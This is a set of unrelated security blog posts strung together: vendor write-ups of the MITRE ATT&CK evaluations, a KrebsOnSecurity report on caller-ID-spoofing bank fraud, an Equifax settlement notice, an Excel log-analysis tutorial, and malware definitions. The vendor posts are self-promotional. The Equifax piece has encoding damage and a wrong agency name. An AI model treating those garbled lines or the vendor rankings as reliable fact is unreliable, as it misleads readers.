The introduction of the MITRE ATT&CK evaluations is a welcomed addition to the third-party testing arena. The ATT&CK framework, and the evaluations in particular, have gone such a long way in helping advance the security industry as a whole, and the individual security products serving the market.

The insight garnered from these evaluations is incredibly useful.  But let’s admit, for everyone except those steeped in the analysis, it can be hard to understand. The information is valuable, but dense. There are multiple ways to look at the data and even more ways to interpret and present the results (as no doubt you’ve already come to realize after reading all the vendor blogs and industry articles!) We have been looking at the data for the past week since it published, and still have more to examine over the coming days and weeks.

The more we assess the information, the clearer the story becomes, so we wanted to share with you Trend Micro’s 10 key takeaways for our results:

1. Looking at the results of the first run of the evaluation is important:

  • Trend Micro ranked first in initial overall detection. We are the leader in detections based on initial product configurations. This evaluation enabled vendors to make product adjustments after a first run of the test to boost detection rates on a re-test. The MITRE results show the final results after all product changes. If you assess what the product could detect as originally provided, we had the best detection coverage among the pool of 21 vendors.
  • This is important to consider because product adjustments can vary in significance and may or may not be immediately available in vendors’ current product. We also believe it is easier to do better, once you know what the attacker was doing – in the real world, customers don’t get a second try against an attack.
  • Having said that, we too took advantage of the retest opportunity since it allows us to identify product improvements, but our overall detections were so high, that even removing those associated with a configuration change, we still ranked first overall.

  • And so no one thinks we are just spinning… without making any kind of exclusions to the data at all, and just taking the MITRE results in their entirety, Trend Micro had the second highest detection rate, with 91+% detection coverage.

2. There is a hierarchy in the type of main detections – Techniques is most significant

  • There is a natural hierarchy in the value of the different types of main detections.
    • A general detection indicates that something was deemed suspicious but it was not assigned to a specific tactic or technique.
    • A detection on tactic means the detection can be attributed to a tactical goal (e.g. credential access).
    • Finally, a detection on technique means the detection can be attributed to a specific adversarial action (e.g. credential dumping).
  • We have strong detection on techniques, which is a better detection measure. With the individual MITRE technique identified, the associated tactic can be determined, as typically, there are only a handful of tactics that would apply to a specific technique. When comparing results, you can see that vendors had lower tactic detections on the whole, demonstrating a general acknowledgement of where the priority should lie.
  • Likewise, the fact that we had lower general detections compared to technique detections is a positive. General detections are typically associated with a signature; as such, this proves that we have a low reliance on AV.
  • It is also important to note that we did well in telemetry which gives security analysts access to the type and depth of visibility they need when looking into detailed attacker activity across assets. 

3. More alerts does not equal better alerting – quite the opposite

  • At first glance, some may expect one should have the same number of alerts as detections. But not all detections are created equal, and not everything should have an alert (remember, these detections are for low level attack steps, not for separate attacks.)
  • Too many alerts can lead to alert fatigue and add to the difficulty of sorting through the noise to what is most important.
  • When you consider the alerts associated with our higher-fidelity detections (e.g. detection on technique), you can see that the results show that Trend Micro did very well at reducing the noise of all of the detections into a minimal volume of meaningful/actionable alerts.

4. Managed Service detections are not exclusive

  • Our MDR analysts contributed to the “delayed detection” category. This is where the detection involved human action and may not have been initiated automatically.
  • Our results shows the strength of our MDR service as one way for detection and enrichment. If an MDR service was included in this evaluation, we believe you would want to see it provide good coverage, as it demonstrates that the team is able to detect based on the telemetry collected.
  • What is important to note though is that the numbers for the delayed detection don’t necessarily mean it was the only way a detection was/could be made; the same detection could be identified by other means. There are overlaps between detection categories.
  • Our detection coverage results would have remained strong without this human involvement – approximately 86% detection coverage (with MDR, it boosted it up to 91%).

5. Let’s not forget about the effectiveness and need for blocking!

  • This MITRE evaluation did not test for a product’s ability to block/protect from an attack, but rather exclusively looks at how effective a product is at detecting an event that has happened, so there is no measure of prevention efficacy included.
  • This is significant for Trend, as our philosophy is to block and prevent as much as you can so customers have less to clean up/mitigate.

6. We need to look through more than the Windows

  • This evaluation looked at Windows endpoints and servers only; it did not look at Linux for example, where of course Trend has a great deal of strength in capability.
  • We look forward to the expansion of the operating systems in scope. Mitre has already announced that the next round will include a linux system.

7. The evaluation shows where our product is going

  • We believe the first priority for this evaluation is the main detections (for example, detecting on techniques as discussed above). Correlation falls into the modifier detection category, which looks at what happens above and beyond an initial detection.
  • We are happy with our main detections, and see great opportunity to boost our correlation capabilities with Trend Micro XDR, which we have been investing in heavily and is at the core of the capabilities we will be delivering in product to customers as of late June 2020.
  • This evaluation did not assess our correlation across email security; so there is correlation value we can deliver to customers beyond what is represented here.

8. This evaluation is helping us make our product better

  • The insight this evaluation has provided us has been invaluable and has helped us identify areas for improvement and we have initiate product updates as a result.
  • As well, having a product with a “detection only” mode option helps augment the SOC intel, so our participation in this evaluation has enabled us to make our product even more flexible to configure; and therefore, a more powerful tool for the SOC.
  • While some vendors try to use it against us, our extra detections after config change show that we can adapt to the changing threat landscape quickly when needed.

9. MITRE is more than the evaluation

  • While the evaluation is important, it is important to recognize MITRE ATT&CK as an important knowledge base that the security industry can both align and contribute to.
  • Having a common language and framework to better explain how adversaries behave, what they are trying to do, and how they are trying to do it, makes the entire industry more powerful.
  • Among the many things we do with or around MITRE, Trend has and continues to contribute new techniques to the framework matrices and is leveraging it within our products using ATT&CK as a common language for alerts and detection descriptions, and for searching parameters.

10. It is hard not to get confused by the fud!

  • MITRE does not score, rank or provide side by side comparison of products, so unlike other tests or industry analyst reports, there is no set of “leaders” identified.
  • As this evaluation assesses multiple factors, there are many different ways to view, interpret and present the results (as we did here in this blog).
  • It is important that individual organizations understand the framework, the evaluation, and most importantly what their own priorities and needs are, as this is the only way to map the results to the individual use cases.
  • Look to your vendors to help explain the results, in the context that makes sense for you. It should be our responsibility to help educate, not exploit.

The post Trend Micro’s Top Ten MITRE Evaluation Considerations appeared first on .

Critical Security Patches Released for Magento, Adobe Illustrator and Bridge

It's not 'Patch Tuesday,' but software giant Adobe today released emergency updates for three of its widely used products that patch dozens of newly discovered critical vulnerabilities. The list of affected software includes Adobe Illustrator, Adobe Bridge, and Magento e-commerce platform, containing a total of 35 vulnerabilities where each one of them is affected with multiple critical

Would You Have Fallen for This Phone Scam?

You may have heard that today’s phone fraudsters like to use caller ID spoofing services to make their scam calls seem more believable. But you probably didn’t know that these fraudsters also can use caller ID spoofing to trick your bank into giving up information about recent transactions on your account — data that can then be abused to make their phone scams more believable and expose you to additional forms of identity theft.

Last week, KrebsOnSecurity told the harrowing tale of a reader (a security expert, no less) who tried to turn the tables on his telephonic tormentors and failed spectacularly. In that episode, the people impersonating his bank not only spoofed the bank’s real phone number, but they were also pretending to be him on a separate call at the same time with his bank.

This foiled his efforts to make sure it was really his bank that called him, because he called his bank with another phone and the bank confirmed they currently were in a separate call with him discussing fraud on his account (however, the other call was the fraudster pretending to be him).

Shortly after that story ran, I heard from another reader — we’ll call him “Jim” since he didn’t want his real name used for this story — whose wife was the target of a similar scam, albeit with an important twist: The scammers were armed with information about a number of her recent financial transactions, which he claims they got from the bank’s own automated phone system just by spoofing her phone number.

“When they originally called my wife, there were no fraudulent transactions on her account, but they were able to specify the last three transactions she had made, which combined with the caller-ID had mistakenly earned her trust,” Jim explained. “After we figured out what was going on, we were left asking ourselves how the crooks had obtained her last three transactions without breaking into her account online. As it turned out, calling the phone number on the back of the credit card from the phone number linked with the card provided the most recent transactions without providing any form of authentication.”

Jim said he was so aghast at this realization that he called the same number from his phone and tried accessing his account, which is also at Citi but wholly separate from his spouse’s. Sure enough, he said, as long as he was calling from the number on file for his account, the automated system let him review recent transactions without any further authentication.

“I confirmed on my separate Citi card that they often (but not quite always) were providing the transaction details,” Jim said. “I was appalled that Citi would do that. So, it seemed the crooks would spoof caller ID when calling Citibank, as well as when calling the target/victim.

The incident Jim described happened in late January 2020, and Citi may have changed its procedures since then. But in a phone interview with KrebsOnSecurity earlier this week, Jim made a call to Citi’s automated system from his mobile phone on file with the bank, and I could hear Citi’s systems asking him to enter the last four digits of his credit card number before he could review recent transactions.

The request for the last four of the customer’s credit card number was consistent with my own testing, which relied on a caller ID spoofing service advertised in the cybercrime underground and aimed at a Citi account controlled by this author.

In one test, the spoofed call let KrebsOnSecurity hear recent transaction data — where and when the transaction was made, and how much was spent — after providing the automated system the last four digits of the account’s credit card number. In another test, the automated system asked for the account holder’s full Social Security number.

Citi declined to discuss specific actions it takes to detect and prevent fraud. But in a written statement provided to this author it said the company continuously monitors and analyzes threats and looks for opportunities to strengthen its controls.

“We see regular attempts by fraudsters to gain access to information and we are constantly monitoring for emerging threats and taking preventive action for our clients’ protection,” the statement reads. “For inbound calls to call centers, we continue to adapt and implement detection capabilities to identify suspicious or spoofed phone numbers. We also encourage clients to install and use our mobile app and sign up for push notifications and alerts in the mobile app.”


Jim said the fraudster who called his wife clearly already knew her mailing and email addresses, her mobile number and the fact that her card was an American Airlines-branded Citi card. The caller said there had been a series of suspicious transactions, and proceeded to read back details of several recent transactions to verify if those were purchases she’d authorized.

A list of services offered by one of several underground stores that sell caller ID spoofing and email bombing services.

Jim’s wife quickly logged on to her Citi account and saw that the amounts, dates and places of the transactions referenced by the caller indeed corresponded to recent legitimate transactions. But she didn’t see any signs of unauthorized charges.

After verifying the recent legitimate transactions with the caller, the person on the phone asked for her security word. When she provided it, there was a long hold before the caller came back and said she’d provided the wrong answer.

When she corrected herself and provided a different security word, there was another long pause before the caller said the second answer she provided was correct. At that point, the caller said Citi would be sending her a new card and that it had prevented several phony charges from even posting to her account.

She didn’t understand until later that the pauses were points at which the fraudsters had to put her on hold to relay her answers in their own call posing as her to Citi’s customer service department.

Not long after Jim’s spouse hung up with the caller, her inbox quickly began filling up with hundreds of automated messages from various websites trying to confirm an email newsletter subscription she’d supposedly requested.

As the recipient of several of theseemail bombing” attacks, I can verify that crooks often will use services offered in the cybercrime underground to flood a target’s inbox with these junk newsletter subscriptions shortly after committing fraud in the target’s name when they wish to bury an email notification from a target’s bank.


In the case of Jim’s wife, the inbox flood backfired, and only made her more suspicious about the true nature of the recent phone call. So she called the number on the back of her Citi card and was told that she had indeed just called Citi and requested what’s known as an “overpayment reimbursement.” The couple have long had their credit cards on auto-payment, and the most recent payment was especially high — nearly $4,000 — thanks to a flurry of Christmas present purchases for friends and family.

In an overpayment reimbursement, a customer can request that the bank refund any amount paid toward a previous bill that exceeds the minimum required monthly payment. Doing so causes any back-due interest on that unpaid amount to accrue to the account as well.

In this case, the caller posing as Jim’s wife requested an overpayment reimbursement to the tune of just under $4,000. It’s not clear how or where the fraudsters intended this payment to be sent, but for whatever reason Citi ended up saying they would cut a physical check and mail it to the address on file. Probably not what the fraudsters wanted, although since then Jim and his wife say they have been on alert for anyone suspicious lurking near their mailbox.

“The person we spoke with at Citi’s fraud department kept insisting that yes, it was my wife that called because the call came from her mobile number,” Jim said. “The Citi employee was alarmed because she didn’t understand the whole notion of caller ID spoofing. And we both found it kind of disturbing that someone in fraud at such a major bank didn’t even understand that such a thing was possible.”


Fraud experts say the scammers behind the types of calls that targeted Jim’s family are most likely fueled by the rampant sale of credit card records stolen from hacked online merchants. This data, known as “CVVs” in the cybercrime underground, is sold in packages for about $15 to $20 per record, and very often includes the customer’s name, address, phone number, email address and full credit or debit card number, expiration date, and card verification value (CVV) printed on the back of the card.

A screen shot from an underground store selling CVV records. Note that all of these records come with the cardholder’s address, email, phone number and zip code. Click to enlarge. Image: Gemini Advisory.

Dozens of cybercrime shops traffic in this stolen data, which is more traditionally used to defraud online merchants. But such records are ideally suited for criminals engaged in the type of phone scams that are the subject of this article.

That’s according to Andrei Barysevich, CEO and co-founder of Gemini Advisory, a New York-based company that monitors dozens of underground shops selling stolen card data.

“If the fraudsters already have the target’s cell phone number, in many cases they already have the target’s credit card information as well,” Barysevich said.

Gemini estimates there are currently some 13 million CVV records for sale across the dark web, and that more than 40 percent of these records put up for sale over the past year included the cardholder’s phone number.

Data from recent financial transactions can not only help fraudsters better impersonate your bank, it can also be useful in linking a customer’s account to another account the fraudsters control. That’s because PayPal and a number of other pure-play online financial institutions allow customers to link accounts by verifying the value of microdeposits.

For example, if you wish to be able to transfer funds between PayPal and a bank account, the company will first send a couple of tiny deposits — a few cents, usually — to the account you wish to link. Only after verifying those exact amounts will the account-linking request be granted.


Both this and last week’s story illustrate why the only sane response to a call purporting to be from your bank is to hang up, look up your bank’s customer service number from their Web site or from the back of your card, and call them back yourself.

Meanwhile, fraudsters who hack peoples’ finances with nothing more than a telephone have been significantly upping the volume of attacks in recent months, new research suggests. Fraud prevention company Next Caller said this week it has tracked “massive increases in call volumes and high-risk calls across Fortune 500 companies as a result of COVID-19.”

Image: Next Caller.

“After a brief reprieve in Week 4 (April 6-12), Week 5 (April 13-19) saw call volume across Next Caller’s clients in the telecom and financial services sectors spike 40% above previous highs,” the company found. “Particularly worrisome is the activity taking place in the financial services sector, where call traffic topped previous highs by 800%.”

Next Caller said it’s likely some of that increase was due to numerous online and mobile app outages for many major financial institutions at a time when more than 80 million Americans were simultaneously trying to track the status of their stimulus deposits. But it said that surge also brought with it an influx of fraudsters looking to capitalize on all the chaos.

“High-risk calls to financial services surged to 50% above pre-COVID levels, with one Fortune 100 bank suffering a high-risk increase of 60% during Week 5,” the company wrote in a recent report.

Massachusetts to Receive $18.2 Million in Settlement Against Equifax

On April 17, 2020, The Massachusetts Attorney General, Maura Healey, announced that Massachusetts will receive a payout of $18.2 million in the settlement against Equifax Inc. The settlement, which was approved in a judgment on April 13, 2020, is in response to the 2017 data breach in which attackers hacked Equifax and gained unauthorized access to the personal information ??? including Social Security numbers and driver???s license numbersツ? ??? of over 147 million U.S. individuals, 3 million of whom were Massachusetts residents.

The plaintiff ??? in this case the Commonwealth of Massachusetts ??? argued that the defendant ??? Equifax ??? knew of the vulnerability in its network but failed to take the necessary measures to prevent a breach.ツ? It was also argued that Equifax, after realizing that consumer data was hacked, failed to report the breach in a timely manner.

Aside from the monetary payout, the settlement also requires Equifax to improve its security practices and meet Massachusetts compliance regulations, including identifying critical security updates, minimizing its data collection, maintaining up-to-date software, and consenting to third-party assessments of its practices.

The funds will be used for state needs and for local consumer groups to assist customers. Massachusetts residents affected by the breach will not be compensated from the payout but can seek relief from the global settlement between Equifax and the Global Trade Commission which was settled in 2019.

What this settlement means for your businesses

Data breaches are becoming more prevalent and more dire. In fact, according to Kaspersky Labs, 46 percent of large businesses worldwide have already had one or more data breaches. And these data breaches effect everyone involved: businesses face lawsuits, employees face terminations, and consumers lose peace of mind.

Judges are not, and will not, cut slack for businesses that do not take the necessary actions to protect consumer data. In fact, following the Equifax settlement, Maura Healey stated that this is ???one of the largest penalties ever paid to a single state over a data breach.??? So now is the time to get serious about your application security and to show your customers that you are prioritizing their wellbeing.

One way to make sure that you have the proper security in place is to have a third-party assess and certify your applications. In a recent IDG survey report, Security as a Competitive Advantage, 66 percent of respondents stated that they would be more likely to work with a certified vendor. By undergoing an unbiased assessment, you can boost customer confidence, prevent future losses, and gain a competitive advantage.

At Veracode, we offer a step-by-step plan to become certifiably secure. Learn more about our program, Veracode Verified, and become a trusted vendor, today.


Excelerating Analysis, Part 2 — X[LOOKUP] Gon’ Pivot To Ya

In December 2019, we published a blog post on augmenting analysis using Microsoft Excel for various data sets for incident response investigations. As we described, investigations often include custom or proprietary log formats and miscellaneous, non-traditional forensic artifacts. There are, of course, a variety of ways to tackle this task, but Excel stands out as a reliable way to analyze and transform a majority of data sets we encounter.

In our first post, we discussed summarizing verbose artifacts using the CONCAT function, converting timestamps using the TIME function, and using the COUNTIF function for log baselining. In this post, we will cover two additional versatile features of Excel: LOOKUP functions and PivotTables.

For this scenario, we will use a dataset of logon events for an example Microsoft Office 365 (O365) instance to demonstrate how an analyst can enrich information in the dataset. Then we will demonstrate some examples of how to use PivotTables to summarize information and highlight anomalies in the data quickly.

Our data contains the following columns:

  • Description – Event description
  • User – User’s name
  • User Principle Name – email address
  • App – such as Office 365, Sharepoint, etc.
  • Location – Country
  • Date
  • IP address
  • User agent (simplified)
  • Organization – associated with IP address (as identified by O365)

Figure 1: O365 data set

LOOKUP for Data Enrichment

It may be useful to add more information to the data that could help us in analysis that isn’t provided by the original log source. A step FireEye Mandiant often performs during investigations is to take all unique IP addresses and query threat intelligence sources for each IP address for reputation, WHOIS information, connections to known threat actor activity, etc. This grants more information about each IP address that we can take into consideration in our analysis.

While FireEye Mandiant is privy to historical engagement data and Mandiant Threat Intelligence, if security teams or organizations do not have access to commercial threat intelligence feeds, there are numerous open source intelligence services that can be leveraged.

We can also use IP address geolocation services to obtain latitude and longitude related to each source IP address. This information may be useful in identifying anomalous logons based on geographical location.

After taking all source IP addresses, running them against threat intelligence feeds and geolocating them, we have the following data added to a second sheet called “IP Address Intel” in our Excel document:

Figure 2: IP address enrichment

We can already see before we even dive into the logs themselves that we have suspicious activity: The five IP addresses in the range in our data are known to be associated with activity connected to a fictional threat actor tracked as TMP.OGRE.

To enrich our original dataset, we will add three columns to our data to integrate the supplementary information: “Latitude,” “Longitude,” and “Threat Intel” (Figure 3). We can use the VLOOKUP or XLOOKUP functions to quickly retrieve the supplementary data and integrate it into our main O365 log sheet.

Figure 3: Enrichment columns


The traditional way to look up particular data in another array is by using the VLOOKUP function. We will use the following formula to reference the “Latitude” values for a given IP address:

Figure 4: VLOOKUP formula for Latitude

There are four parts to this formula:

  1. Value to look up:
    • This dictates what cell value we are going to look up more information for. In this case, it is cell G2, which is the IP address.
  2. Table array:
    • This defines the entire array in which we will look up our value and return data from. The first column in the array must contain the value being looked up. In the aforementioned example, we are searching in ‘IP Address Intel’!$A$2:$D:$15. In other words, we are looking in the other sheet in this workbook we created earlier titled “IP Address Intel”, then in that sheet, search in the cell range of A2 to D15.

      Figure 5: VLOOKUP table array

      Note the use of the “$” to ensure these are absolute references and will not be updated by Excel if we copy this formula to other cells.
  3. Column index number:
    • This identifies the column number from which to return data. The first column is considered column 1. We want to return the “Latitude” value for the given IP address, so in the aforementioned example, we tell Excel to return data from column 2.
  4. Range lookup (match type)
    • This part of the formula tells Excel what type of matching to perform on the value being looked up. Excel defaults to “Approximate” matching, which assumes the data is sorted and will match the closest value. We want to perform “Exact” matching, so we put “0” here (“FALSE” is also accepted).

With the VLOOKUP function complete for the “Latitude” data, we can use the fill handle to update this field for the rest of the data set.

To get the values for the “Longitude” and “Threat Intel” columns, we repeat the process by using a similar function and, adjusting the column index number to reference the appropriate columns, then use the fill handle to fill in the rest of the column in our O365 data sheet:

  • For Longitude:
    • =VLOOKUP(G2,'IP Address Intel'!$A$2:$D$15,3,0)
  • For Threat Intel:
    • =VLOOKUP(G2,'IP Address Intel'!$A$2:$D$15,4,0)

Bonus Option: XLOOKUP

The XLOOKUP function in Excel is a more efficient way to reference the threat intelligence data sheet. XLOOKUP is a newer function introduced to Excel to replace the legacy VLOOKUP function and, at the time of writing this post, is only available to “O365 subscribers in the Monthly channel”, according to Microsoft. In this instance, we will also leverage Excel’s dynamic arrays and “spilling” to fill in this data more efficiently, instead of making an XLOOKUP function for each column.

NOTE: To utilize dynamic arrays and spilling, the data we are seeking to enrich cannot be in the form of a “Table” object. Instead, we will apply filters to the top row of our O365 data set by selecting the “Filter” option under “Sort & Filter” in the “Home” ribbon:

Figure 6: Filter option

To reference the threat intelligence data sheet using XLOOKUP, we will use the following formula:

Figure 7: XLOOKUP function for enrichment

There are three parts to this XLOOKUP formula:

  1. Value to lookup:
    • This dictates what cell value we are going to look up more information for. In this case, it is cell G2, which is the IP address.
  2. Array to look in:
    • This will be the array of data in which Excel will search for the value to look up. Excel does exact matching by default for XLOOKUP. In the aforementioned example, we are searching in ‘IP Address Intel’!$A$2:$A:$15. In other words, we are looking in the other sheet in this workbook titled “IP Address Intel”, then in that sheet, search in the cell range of A2 to A15:

      Figure 8: XLOOKUP array to look in

      Note the use of the “$” to ensure these are absolute references and will not be updated by Excel if we copy this formula to other cells.
  3. Array of data to return:
    • This part will be the array of data from which Excel will return data. In this case, Excel will return the data contained within the absolute range of B2 to D15 from the “IP Address Intel” sheet for the value that was looked up. In the aforementioned example formula, it will return the values in the row for the IP address

      Figure 9: Data to be returned from ‘IP Address Intel’ sheet

      Because this is leveraging dynamic arrays and spilling, all three cells of the returned data will populate, as seen in Figure 4.

Now that our dataset is completely enriched by either using VLOOKUP or XLOOKUP, we can start hunting for anomalous activity. As a quick first step, since we know at least a handful of IP addresses are potentially malicious, we can filter on the “Threat Intel” column for all rows that match “TMP.OGRE” and reveal logons with source IP addresses related to known threat actors. Now we have timeframes and suspected compromised accounts to pivot off of for additional hunting through other data.


One of the most useful tools for highlighting anomalies by summarizing data, performing frequency analysis and quickly obtaining other statistics about a given dataset is Excel’s PivotTable function.

Location Anomalies

Let’s utilize a PivotTable to perform frequency analysis on the location from which users logged in. This type of technique may highlight activity where a user account logged in from a location which is unusual for them.

To create a PivotTable for our data, we can select any cell in our O365 data and select the entire range with Ctrl+A. Then, under the “Insert” tab in the ribbon, select “PivotTable”:

Figure 10: PivotTable selection

This will bring up a window, as seen in Figure 11, to confirm the data for which we want to make a PivotTable (Step 1 in Figure 11). Since we selected our O365 log data set with Ctrl+A, this should be automatically populated. It will also ask where we want to put the PivotTable (Step 2 in Figure 11). In this instance, we created another sheet called “PivotTable 1” to place the PivotTable:

Figure 11: PivotTable creation

Now that the PivotTable is created, we must select how we want to populate the PivotTable using our data. Remember, we are trying to determine the locations from which all users logged in. We will want a row for each user and a sub-row for each location the user has logged in from. Let’s add a count of how many times they logged in from each location as well. We will use the “Date” field to do this for this example:

Figure 12: PivotTable field definitions

Examining this table, we can immediately see there are two users with source location anomalies: Ginger Breadman and William Brody have a small number of logons from “FarFarAway”, which is abnormal for these users based on this data set.

We can add more data to this PivotTable to get a timeframe of this suspicious activity by adding two more “Date” fields to the “Values” area. Excel defaults to “Count” of whatever field we drop in this area, but we will change this to the “Minimum” and “Maximum” values by using the “Value Field Settings”, as seen in Figure 13.

Figure 13: Adding min and max dates

Now we have a PivotTable that shows us anomalous locations for logons, as well as the timeframe in which the logons occurred, so we can hone our investigation. For this example, we also formatted all cells with timestamp values to reflect the format FireEye Mandiant typically uses during analysis by selecting all the appropriate cells, right-clicking and choosing “Format Cells”, and using a “Custom” format of “YYYY-MM-DD HH:MM:SS”.

Figure 14: PivotTable with suspicious locations and timeframe

IP Address Anomalies

Geolocation anomalies may not always be valuable. However, using a similar configuration as the previous example, we can identify suspicious source IP addresses. We will add “User Principle Name” and “IP Address” fields as Rows, and “IP Address” as Values. Let’s also add the “App” field to Columns. Our field settings and resulting table are displayed in Figure 15:

Figure 15: PivotTable with IP addresses and apps

With just a few clicks, we have a summarized table indicating which IP addresses each user logged in from, and which app they logged into. We can quickly identify two users logged in from IP addresses in the range six times, and which applications they logged into from each of these IP addresses.

While these are just a couple use cases, there are many ways to format and view evidence using PivotTables. We recommend trying PivotTables on any data set being reviewed with Excel and experimenting with the Rows, Columns, and Values parameters.

We also recommend adjusting the PivotTable options, which can help reformat the table itself into a format that might fit requirements.


These Excel functions are used frequently during investigations at FireEye Mandiant and are considered important forensic analysis techniques. The examples we give here are just a glimpse into the utility of LOOKUP functions and PivotTables. LOOKUP functions can be used to reference a multitude of data sources and can be applied in other situations during investigations such as tracking remediation and analysis efforts.

PivotTables may be used in a variety of ways as well, depending on what data is available, and what sort of information is being analyzed to identify suspicious activity. Employing these techniques, alongside the ones we highlighted previously, on a consistent basis will go a long way in "excelerating" forensic analysis skills and efficiency.

5 Ways to Improve Business Cyber-Resilience

Reading Time: ~ 3 min.

A popular military maxim speaks to the need for redundancy and it goes like this: “Two is one and one is none.” Redundancy is also a key principle when it comes to cyber-resilience. A popular rule in data protection and disaster recovery is called the 3-2-1 backup rule. IT pros often borrow from military strategies when approaching cyber-resilience, including a strategy known as “defense in depth.”

Defense in depth is a useful framework for protecting IT environments. It acknowledges that hackers will often use evasive tactics or brute force to overrun the outer-most layer of defense. So, multiple layers of defense are necessary – or defense in depth – to anticipate and mitigate lost ground. Cyber-resilience is a very high priority for businesses. So, we put together these five tips for improving cyber-resilience based on a defense-in-depth approach.

Tip #1: Sharpen perimeter defenses

Cybercriminals are getting better at using evasive tactics to circumvent company firewalls and antivirus. Some of these evasive tactics include file-based, file-less, obfuscated and encrypted script attacks. To counter these tactics, we’re rolling out a new shield technology to detect, block and remediate evasive attacks much faster and more effectively than before. Webroot® Evasion Shield stops attacks that elude other endpoint protection solutions. Cloud-based threat intelligence further increases resilience at the perimeter.

Tip #2: Strengthen the first line of defense – people

The primary vector for malware distribution is phishing attacks. While cybercriminals find increasingly deceptive ways to trick employees into downloading malicious code, not enough businesses are countering by educating their workforces about identifying suspicious activity. With employees being the weakest link in the cyber-security chain, the solution is regular security awareness training, with phishing simulations and courses on best practices for identifying and reporting suspicious activity.

Tip #3: Secure your DNS connection

The domain name system (DNS) is what allows internet traffic to find your website. But DNS protocols were not designed for security. In fact, they’re highly vulnerable to cyberattacks, including cache poisoning, DDoS, DNS hijacking, botnets, Command-and-Control (C&C) and man-in-the-middle attacks. A cloud-based DNS security solution enables businesses to enforce web access policies and stop threats at the network’s edge before they ever hit the network or endpoints.

Tip #4: Create and deploy a backup strategy 

Redundancy is essential for cyber-resilience. Businesses must consider a scenario where malware circumvents outer defenses. Since detecting and remediating malware infections can be time-consuming, it’s important to have copies of files and data for business continuity. Scheduled backup with file versioning is necessary for mitigating malware infections and other forms of data loss. The scheduling feature is crucial since leaving it up to users exposes backup policy to human error.

Tip #5: Test recovery strategy regularly

Backup and recovery go hand-in-hand. And backup is only effective if it enables rapid recovery with minimal disruption. It’s important to test disaster recovery practices and procedures before you experience a live disaster scenario. Disasters come in different shapes and sizes, so it’s important to test simple file and folder recovery as well as large-scale system restore. Also, some systems are more critical than others. Tier-one systems (the most critical) need high levels of uptime, approaching 100%. This traditionally requires a secondary data center that is very costly to acquire and maintain. This is no longer the case. Disaster recovery as a service reduces the cost of standing up a secondary environment. It also allows for frequent testing of disaster recovery protocols. Businesses should test once a quarter – or at least once a year – to ensure systems are cyber-resilient when necessary.

To get started on the road to cyber resilience, take a fee trial here.

The post 5 Ways to Improve Business Cyber-Resilience appeared first on Webroot Blog.

MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security

In our recent Racing with Cozy Bear blog, we covered the concept of Time Based Security and highlighted the value protection brings to the defender. This is not to say that blocking an attack removes the threat actor from the equation. Attack-blocking protection slows down the offender, buying the defender valuable time to respond. There are three reasons for this:

  1. Blocking an advance, forces the offender to change their approach and try again
  2. Block-level detections are inherently high fidelity, elevating their priority for defenders
  3. Defenders can focus on other higher priority detected events that have not been blocked

As part of the APT29 evaluation, MITRE did not allow vendors to deploy products in blocking mode as not to interfere with the test. However, they did allow for the deployment of such technologies in non-blocking mode and for participants to highlight scenarios where products would have blocked.

Block-level detections bolstered McAfee’s performance more than any other vendor.

In future evaluations MITRE has stated that protection results will receive their own categories, but during the APT29 evaluation, MITRE captured block-level detections as footnotes as shown in Figure 1.

Figure 1 – Example of Block footnote

From a defender’s perspective, detections that are more definitive are more actionable with increasing value. In keeping with Time Based Security, Host Interrogation has been brought into the following chart; a visual representation of detection types from the evaluation.

Figure 2 – Time-base representation of the value for each detection type

The scope of MITRE’s APR29 evaluation covered 20 major steps across all participating vendors, covering 57 techniques spread across 134 sub-steps. One major step was removed due to emulation challenges, leaving 19 major steps.

The following chart shows plots the highest-ranking detection from each participant. Each step represents the major attacker milestones as emulated, and an opportunity for the defender to protect, detect, and respond.

Figure 3 – Time-Base Security view of best coverage per major step

Another representation of this data is to aggregate these top-detection values for each participant. Here a block modifier is applied to fully represent non-blocking detections as well.

Table 1 – Block Modifier value assignments
Figure 4 – Aggregate Time-Base Security view

Not only did block-level detections bolster McAfee’s performance more than any other vendor, but MVISION Endpoint was the only solution to report such detections on several attack steps.

An example of this in action was captured during:

  • Step 11 – Initial Compromise
    • Technique T1140 (Deobfuscate/Decode Files or Information)
      • Sub-step 11.A.10 (Decoded an embedded DLL payload to disk using certutil.exe)

Living off the land binaries (aka lolbins) are native operating system files that can be (ab)used for more than their original intent. Adversaries are known to use them to bypass security controls since most of these programs are otherwise trusted. Either used in a macro or from the command-line, there are several examples available. A popular choice by groups such as APT28, Turla, Oilrig, and APT10 is the ‘certutil.exe’ tool. Originally intended to query for certificate information or configure Certificate Services, it can also be used to obfuscate/de-obfuscate data (T1140) or remote file copy (T1105) to download files.

At the time of this writing, MITRE has 70 report references for T1140, indeed making it a go-to technique for many offenders. Figures 5 and 6 were captured during the evaluation of this technique.

Figure 5 – JTI rule prevents live off the land attacks using certutil.exe during sub-step 11.A.10
Figure 6 – JTI rule prevents live off the land attacks using certutil.exe during sub-step 11.A.10


While this coverage was provided by MVISION Endpoint, the underlying technology involved is the same in McAfee Endpoint Security 10.7.

Ultimately, coverage is about time. MITRE’s APT29 evaluation in its own way highlighted McAfee’s Time Based Security protection and McAfee’s distinction in block-level detection. Buying time by throwing a speed bump into the path of a speeding Cozy Bear can be the difference in winning the race for security.

*All data is from:


© 2018 – 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security appeared first on McAfee Blogs.

Malware, Virus, Anti-malware, Antivirus: What’s the Difference?

Romeo once asked the now infamous question, “what’s in a name?” If he’d been asking about malicious software, Juliet surely would have answered, “well, it’s complicated.” The world of cybersecurity has been such a goldmine of new terms and buzzwords that it is easy to get them a bit jumbled. Read on to find out the difference between malware and a virus, and how you can best protect your organization from them.

Viral Terminology

Malware is the broad term that covers every type of software that is created to disable or damage computer systems. Though people often use virus as the generic term for malicious software, a virus is actually just one type of malware. Below are descriptions of a few of the most common pieces of malware:


  • Virus- Just like its biological namesake, a computer virus infects a computer system by replicating itself without user permission, inserting its own code into preexisting programs. In order to spread to other systems, the virus must be attached to a file or executable program, and only infects a system when opened. This typically causes various amounts of damage, from impeding work through annoying popups to causing a complete system crash.

  • Worm- Similar to a virus, a worm can replicate itself on a computer system and cause varying levels of damage. Unlike a virus, a worm is a standalone program, and does not need to be attached to a file and opened to spread. A worm exploits vulnerabilities in a system, and uses network connections to infect other systems with similar weaknesses.

  • Spyware- Spyware is software that monitors, collects, and transmits data from a computer system without a user’s or organization’s knowledge.

